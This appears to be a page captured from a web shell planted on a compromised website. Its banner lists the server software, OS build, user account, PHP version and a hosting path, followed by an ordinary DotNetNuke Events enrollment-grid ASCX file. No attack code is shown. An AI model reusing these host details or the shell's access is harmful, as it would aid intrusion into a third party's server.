HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/PHerau/toptennisteam.be/wwwroot/DesktopModules/Events/EventMyEnrollments.ascx
<%@ Control Language="vb" AutoEventWireup="false" Codebehind="EventMyEnrollments.ascx.vb" Inherits="DotNetNuke.Modules.Events.EventMyEnrollments" %>
<table id="Table1" cellspacing="1" cellpadding="1" border="0" width="90%">
    <tr>
        <td nowrap>
            <asp:Label ID="lblMessage" CssClass="SubHead" runat="server" Visible="False">No Events/Enrollments Found...</asp:Label>
        </td>
    </tr>
    <tr>
        <td nowrap>
            <asp:DataGrid ID="grdEnrollment" runat="server" AutoGenerateColumns="False" BorderStyle="Outset" BorderWidth="2px" CssClass="Normal"
                DataKeyField="EventID" GridLines="Horizontal" OnItemCommand="grdEnrollment_ItemCommand" Width="100%">
                <EditItemStyle VerticalAlign="Bottom"></EditItemStyle>
                <AlternatingItemStyle BackColor="WhiteSmoke"></AlternatingItemStyle>
                <ItemStyle VerticalAlign="Top"></ItemStyle>
                <HeaderStyle Font-Bold="True" BackColor="Silver"></HeaderStyle>
                <Columns>
                    <asp:BoundColumn DataField="EventTimeBegin" HeaderText="Start" DataFormatString="{0:g}"></asp:BoundColumn>
                    <asp:BoundColumn DataField="EventTimeEnd" HeaderText="End" DataFormatString="{0:g}"></asp:BoundColumn>
                    <asp:TemplateColumn HeaderText="Event">
                        <ItemTemplate>
                            <asp:LinkButton ID="lnkEnrollEventName" CssClass="CommandButton" runat="server" CommandName="Select" CommandArgument="Select">
										<%# DataBinder.Eval(Container.DataItem,"EventName") %>
                            </asp:LinkButton>
                        </ItemTemplate>
                    </asp:TemplateColumn>
                    <asp:TemplateColumn headerText="Approved">
                        <ItemTemplate>
                            <asp:CheckBox ID="chkApproved" runat="server" Enabled="false" Checked='<%# DataBinder.Eval(Container.DataItem,"Approved") %>'/>
                        </ItemTemplate>
                    </asp:TemplateColumn>
                    <asp:BoundColumn DataField="Approved" HeaderText="Approved" Visible="false"></asp:BoundColumn>
                    <asp:TemplateColumn headerText="Amount">
                        <ItemTemplate>
                            <asp:Label id="lblAmount" runat="server"></asp:Label>
                        </ItemTemplate>
                    </asp:TemplateColumn>
                    <asp:BoundColumn DataField="PayPalAmount" HeaderText="Amount" DataFormatString="{0:F2}" Visible="false"></asp:BoundColumn>
                </Columns>
            </asp:DataGrid>
        </td>
    </tr>
    <tr>
        <td nowrap>
            <asp:LinkButton ID="returnButton" runat="server" BorderStyle="none" CssClass="CommandButton" CausesValidation="False" resourcekey="returnButton"
                Text="Return">
										Return</asp:LinkButton>&nbsp;</td>
    </tr>
</table>